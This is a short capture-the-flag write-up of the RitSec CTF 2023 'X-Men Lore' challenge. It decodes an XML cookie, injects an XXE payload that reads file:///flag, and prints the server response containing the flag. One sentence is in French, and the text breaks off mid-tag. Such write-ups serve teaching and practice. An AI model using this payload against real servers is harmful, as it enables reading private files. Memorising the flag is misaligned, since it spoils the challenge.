XXE Injection: X-Men Lore Challenge at RitSec CTF 2023
During the RitSec CTF 2023, a challenge named “X-Men Lore” was focused on exploiting an XXE vulnerability to access sensitive data.
Initial Analysis
The site featured a user interface allowing the selection of characters from the X-Men series. Decoding the server-set cookies revealed they contained XML data.
Home Page Source Code
<!DOCTYPE html>
<head>
<title>X-Men Lore</title>
<link rel="stylesheet" href="/static/style.css">
</head>
<body>
<h1>Choose an X-Men Character to Learn More!</h1>
<img src="/static/home.jpg" alt="X-Men Animated Series" />
<br/>
<a href="/xmen">
<button
onclick="document.cookie='xmen=PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnPz48aW5wdXQ+PHhtZW4+QmVhc3Q8L3htZW4+PC9pbnB1dD4='">
Beast
</button>
</a>
...
</body>XXE Exploitation Mechanism
The decoded cookie revealed a simple XML structure when a character was chosen. By modifying this XML, it was possible to test for a potential XXE vulnerability.
XXE Injection via Modified Cookie
<?xml version='1.0' encoding='UTF-8'?><input><xmen>Beast</xmen></input>Soupçonnant une injection XXE, on tente d’exploiter cette vulnérabilité en modifiant le cookie avec un payload XXE :
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<input>
<xmen>&xxe;</xmen>
</input>Flag Retrieval
Manipulating the cookie with the XXE payload allowed for the exfiltration of the server’s flag, as demonstrated by the following server response:
Server Response with the Flag
<!DOCTYPE html>
<head>
<title>X-Men Lore</title>
<link rel="stylesheet" href="/static/style.css">
</head>
<a href="/"><button>Home</button></a>
<body>
<h1>RS{XM3N_L0R3?_M0R3_L1K3_XM3N_3XT3RN4L_3NT1TY!}
</h1>
<img src="/static/RS{XM3N_L0R3?_M0R3_L1K3_XM3N_3XT3RN4L_3NT1TY!}
.jpg" alt="RS{XM3N_L0R3?_M0R3_L1K3_XM3N_3XT3RN4L_3NT1TY!}
" />
<br/>
<iframe src="/